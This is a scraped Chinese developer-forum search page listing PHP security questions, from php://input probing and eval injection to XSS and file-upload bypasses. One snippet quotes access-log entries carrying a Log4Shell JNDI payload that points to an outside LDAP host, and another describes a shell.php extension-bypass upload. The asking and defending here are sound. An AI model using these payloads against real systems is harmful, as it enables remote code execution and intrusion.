腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
3
回答
哪种类型的漏洞涉及
攻击
者发送"
php
://input"?
、
我的网站刚刚被一个
攻击
者轰炸,
攻击
者试图将"
php
://input“传递给他们能想到的任何GET/POST变量。如果这是试图
利用
一个漏洞,我不知道它。该用户可能试图
利用
什么?
浏览 2
提问于2010-12-15
得票数 10
回答已采纳
1
回答
如何用$_SERVER['REQUEST_URI']注入
PHP
代码
、
在我看来,以下来自
php
网页的代码可能会被
利用
。$path = substr($_SERVER['REQUEST_URI'], 0, strpos($_SERVER; 在请求uri中发送
php
语法的
攻击
者可以
利用
以下语句之一进行
浏览 1
提问于2014-08-12
得票数 1
回答已采纳
1
回答
使用echo是否会将数据显示为javascript?
、
假设我们有一个login.
php
文件,如下所示:$username = $_POST['username'];// check fields and if they were> 黑客可以
利用
php
攻击
对简单的XSS代码进行
攻击
吗?
浏览 4
提问于2015-08-24
得票数 0
回答已采纳
2
回答
需要帮助
利用
php
脚本的挑战漏洞
、
、
、
、
我试图
利用
Wechall.net的“停止我们”的
php
脚本中的一个漏洞进行
攻击
,我不确定,但我想我找到了这个漏洞,但现在我不知道如何
利用
它。我在
PHP
.net上做了一些研究,我相信用户可以中止/关闭连接,然后脚本的进程就会终止,因为没有设置ignore_user_abort,所以在购买了以下脚本中的“域”之后,
攻击
者就可以关闭连接,而平衡也不会减少下面是挑战:易损代码的易受
攻击
代码 如何在特定时间关闭/中止连接?(竞赛窗口)
浏览 0
提问于2016-05-12
得票数 0
回答已采纳
1
回答
攻击
者如何
利用
$_SERVER['HTTP_REFERER']
有人警告我,
PHP
的$_SERVER['HTTP_REFERER']是网站常见的
攻击
载体。
攻击
者
利用
此功能的方式有哪些?我怎么才能防范他们?
浏览 0
提问于2014-05-20
得票数 4
3
回答
如何在图片中编写
php
代码
我读到一篇
php
文章,
攻击
者可以在GIF图片中间插入
PHP
代码,然后将这个“邪恶”图片上传到网站上,然后网站可能会被安全漏洞
利用
任何朋友都可以给出一个想法来抵抗这种类型的
攻击
。
浏览 11
提问于2012-10-12
得票数 1
回答已采纳
1
回答
Xmlrpc容易受到xxe
攻击
吗?
、
、
、
、
也许这不是话题,但这对我来说很重要,所以我现在问你们,谢谢。
浏览 1
提问于2017-08-11
得票数 1
回答已采纳
2
回答
PHP
溢出
在消除脆弱性方面:in
PHP
我可以看到这可能是一个本地问题,但
攻击
者如何可能远程
利用
这一漏洞?确切漏洞:http://www.securityfocus.com/bid/47950
浏览 0
提问于2012-04-03
得票数 2
回答已采纳
1
回答
从URL和COOKIE中隐藏
PHP
会话ID
、
、
、
、
我的目的是避免使用PHPSESSID变量进行黑客
攻击
。但是我希望我的
PHP
仍然
利用
会话。
浏览 3
提问于2014-10-02
得票数 2
2
回答
如何
利用
PHP
中重定向漏洞后的执行?
、
、
但是很难想到
PHP
中的EAR漏洞。有人能提供一个关于
攻击
者如何
利用
该漏洞的具体示例吗?
浏览 8
提问于2014-03-04
得票数 2
回答已采纳
1
回答
访问日志中的多个Log4漏洞
我在magento2中的应用。我查了我的访问日志。访问日志中的多个条目如下所示。我不确定是否在我的代码中注入了log4j,因为每个请求都是302。请查看下面的访问日志示例。 "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F167.99.115.242%3A1389%2FBinary%7D HTTP/1.1" 302 275 "${jndi:ldap://167.99.115.242:1389/Binary}" "${jndi:ldap://167.99.115.242:1389/Binary}
浏览 0
提问于2021-12-20
得票数 1
回答已采纳
1
回答
最后带有特殊字符的
PHP
执行
、
、
我试图复制这个漏洞: 根据解释,可以绕过Wordpress插件中的检查,在
php
扩展后添加一个特殊的char。我正在尝试
攻击
,文件上传时名为shell.
php
<special_char>,包含一个简单的
php
代码<?
php
echo "poc"; ?>。 然后,我应该在<target>/..../shell
浏览 0
提问于2020-12-22
得票数 1
1
回答
ImageMagick < 6.9.3-9 -多重漏洞问题
、
您知道任何受最近 ImageMagick
攻击
影响的包含管理系统或其他应用程序吗?(我已经使用了在Linux上提供的转换工具)
浏览 0
提问于2016-05-30
得票数 0
回答已采纳
2
回答
在
PHP
中保护危险的静态方法
、
、
myClass.
php
// validate input and determine the appropriatehelper::removeFolder($folder); static function removeFolder($folder) {现在,我正在使用这个检查调用的类名 我特别关注
攻击
者
浏览 5
提问于2015-02-10
得票数 0
回答已采纳
2
回答
如何防止上传的文件被执行?
例如,有人可以上传
php
文件并
利用
它来
攻击
网站,我想要防止这种情况。有没有什么htaccess魔术我能做的?
浏览 0
提问于2011-06-16
得票数 7
回答已采纳
1
回答
有没有办法让HTTP请求头变得不可变?
、
利用
HTTP请求本身中的向量可以
攻击
web应用程序的方式多种多样。HTTP响应拆分等
攻击
利用
修改请求标头本身来
攻击
易受
攻击
的应用程序。
浏览 10
提问于2017-01-24
得票数 2
3
回答
攻击
矢量,
攻击
面,漏洞,
利用
:区别在哪里?
、
我很难找出
攻击
矢量/
攻击
面/漏洞和
利用
之间的区别。根据维基百科(漏洞)因此,
攻击
表面和漏洞似乎是IT安全上下文中的同义词(?
浏览 0
提问于2015-06-04
得票数 25
回答已采纳
2
回答
有没有办法找出我是怎么被黑的?缺点是什么?
在第二次
攻击
时,所有表都被清除,一些
php
文件的代码被更改:/删除已创建的所有非系统Ftp帐户检查脚本中的任何头注入
攻击
、Sql注入
攻击
、跨站点脚本
攻击
等,以及您的
php
.ini文件设置。 如果您的脚本被感染,您可能希望回滚到您的帐户的上一次良好快照备份。我试图尽我所能做到所有这些,特别是关于“头注入
攻击
、Sql注入
攻击</e
浏览 0
提问于2010-02-23
得票数 1
2
回答
在执行从数组生成的字符串时,
PHP
的eval()函数容易受到代码注入的影响吗?
、
、
、
、
我正试图了解更多关于
PHP
()
利用
的知识,并遇到了这样的情况: $cmd = "echo \"" .除了XSS错误之外,此代码段是否易受
攻击
?这会被滥用到
PHP
代码注入中吗?
浏览 0
提问于2018-01-10
得票数 7
回答已采纳
1
回答
非恶意的错误能引发恶意的错误吗?
、
随着关键的网络物理系统(CPS)在我们的日常生活(汽车、地铁、无人机、船舶.)的指数上升,
攻击
者如何能够
利用
非恶意的故障(例如,由于组件老化或由于成本限制或不称职,可能导致内存膨胀/泄漏,数据碎片.)来制造恶意的错误我正在试图找到一些对我的问题有利的消息来源,即
攻击
者是否有可能等待非恶意错误发生,以便
利用
它们发起
攻击
?如果在高保证部分的路径上存在低保证组件,容易发生故障,
攻击
者是否有可能
利用
低保证组件的自然故障来突破高保证组件? 我发现的主要来源是故障
浏览 0
提问于2018-11-24
得票数 2
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
利用 phar 拓展 php 反序列化漏洞攻击面
PHP UDP攻击查找源头
攻击者正在利用PHP Weathermap漏洞向Linux服务器传播恶意挖矿软件
如何利用php实现守护进程
SYN攻击如何利用TCP协议发动攻击?
热门
标签
更多标签
云服务器
ICP备案
对象存储
实时音视频
即时通信 IM
活动推荐
运营活动
广告
关闭
领券